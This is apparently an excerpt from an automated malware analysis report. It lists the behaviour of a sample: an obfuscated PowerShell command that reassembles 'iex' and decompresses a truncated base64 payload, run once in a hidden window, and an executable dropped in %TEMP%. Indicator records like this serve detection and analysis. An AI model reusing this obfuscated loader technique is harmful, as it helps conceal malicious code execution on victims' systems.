Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' . ( ([STrIng]$VErBosepREFERenCe)[1,3]+'X'-joiN'')( NeW-oBJECt io.ComPresSION.defLATEstrEAm([SYsTEm.io.MEmorYstREAm][sySTem.CONVert]::FROmBase64StrINg('VZBBTwIxFIT/yh6aFIK03FSaTVARowc1wQQPXrrtg3...
- %TEMP%\978.exe
- %TEMP%\978.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' . ( ([STrIng]$VErBosepREFERenCe)[1,3]+'X'-joiN'')( NeW-oBJECt io.ComPresSION.defLATEstrEAm([SYsTEm.io.MEmorYstREAm][sySTem.CONVert]::FROmBase64StrINg('VZBBTwIxFIT/yh6aFIK03FSaTVARowc1wQQPXrrtg3...' (with a hidden window)